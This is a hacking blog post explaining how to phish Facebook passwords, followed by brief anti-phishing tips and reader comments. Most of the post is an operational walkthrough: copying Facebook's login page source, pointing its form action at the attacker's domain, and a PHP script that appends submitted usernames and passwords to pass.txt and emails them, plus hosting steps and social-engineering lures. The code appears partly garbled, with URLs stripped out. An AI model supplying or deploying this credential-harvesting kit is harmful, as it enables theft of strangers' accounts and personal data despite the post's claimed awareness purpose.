Tech | Hack | Blog | Code

What is Phishing? How to Hack Facebook Account Password with Phishing?

Phishing is a hacking technique in which hacker setup a fake website that is usually clone of a legitimate website and looks genuine to a normal internet user. Then the hacker tricks (using social engineering) the target (someone specific or bulk unknown users) to login through this phishing website so that he (Hacker) could log and steal target’s password & other important details.

Just for your information, phishing is a very successful hacking technique and works even smoothly to hack and trick computer professional and experts, if done properly. In phishing process, once the innocent user submits their detail to hacker (i.e. phishing website), victim is redirected to original website and everything works smoothly (because phishing website submits collected victim’s username and password to the original website and victim successfully log-ins and get access to original website and nothing changes for the victim at that time).

In this article I’m going to demonstrate you how simple facebook phishing is (with the help of video) and how to protect yourself from phishing. 

Hacking Facebook Account & Password using Phishing:

To demonstrate phishing we need two necessary things:

  1. A webhost or webserver where your fake pages (phishing websites) will be hosted.
  2. A phishing website itself that should have the capability to store facebook passwords.

First we’ll setup an account at some web hosting company. I will choose free web hosting and will then signup for a free account there. I have selected sub-domain (refer the video). Confirm the account via email verification and then move to next step.

Now visit to then make a right click on the facebook login page and click on “view page source”. You’ll get source code of facebook page then select all facebook code and copy it.

Visit to and download the notepad++ software and install it. Open notepad++ and paste all the copied facebook source code there. Now search for ‘action’ word in it and locate following lines:

<form id=”login_form” action=”” method=”post” onsubmit=”return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)”>

Change the above link to (replace “” with your own domain name) and save the file as index.htm.

Now following is the mail.php file, copy it and edit the links to your own domain name (actually replace them with full path of your phishing pages). Now the data (username, password and other details) entered by victim will be transferred to mail.php which will handle all the data and store it in pass.txt file for you (hacker).

header ('Location:');

$posts        = '';
foreach($_POST as $k => $v){
    $posts .= '$_POST['.$k.'] = '.$v."\n";

$posts  .= "------------------------------------------\n";
$emailto = '';
$from    = "";
$body        = '

@mail($emailto, $subject, $body, $from);
$handle = @fopen("pass.txt", "a+");
@fwrite($handle, $posts);

Now you both files (index.html and mail.php) are ready. Login to web hosting account and then go to cpanel and use file manager to upload these two files (refer to video).

Now your phishing website with capability to store password & other details are setup. Now it’s time for social engineering to trick you target to login to your phishing website. 

The Story: How Facebook account and password will be hacked?

When the target will visit your domain (phishing website) or you’ll trick the target to visit there, target will see facebook (actually, cloned website) hosted on your domain.

As usual, target will hopefully not notice the phishing website and will try to login into it. Then he will lose his facebook account password, how?

Facebook Phishing

Facebook Phishing

After writing username and password, when the target will click login button – the facebook password and account details will be send to your mail.php file. Mail.php file will create a pass.txt file (if not already present) and will then store the passwords and other account details there.     

Hacker will login to web hosting account and will then read the content of pass.txt later (i.e. account detail and passwords).

Hacking Facebook Account Password

Hacking Facebook Account Password


(Unfortunately YouTube removed that video but find you can still find the transcript at and video at

TIPS to Stay Safe Against Phishing Attacks:

  1. Use popular and updated web browsers such as Google Chrome, Mozilla Firefox, Apple-Safari, Opera etc. They can easily detect phishing pages and websites (refer to video).
  2. Use a good antivirus (additionally anti-spyware &  anti-adware protection) as they usually help detect and block these phishing pages.
  3. Before logging into any website’s account don’t forget to check browser’s address bar to confirm the webpage address and website’s location. Note: Important websites uses https:// instead of http:// (‘s’ can be seen as secure) in URL (for eg., , All Banks’ website etc.).
  4. Don’t visit the webpages you don’t trust or at least don’t submit important details such as username, account’s password, PIN and other credentials.

Join the discussion

  1. qwnaqvi

    Extremely useful information.

  2. Vendetta

    Phishing is about as likely to work as trying to punch Facebook in the face until they give it to you.

  3. Aman

    But whre to copy and edit…
    and which link should i give


      Everything is written in article and for detailed explanation & demonstration watch the video. The article is here to make you realize that how insecure a normal Internet user is and how he can protect him/herself.

Comments are now closed.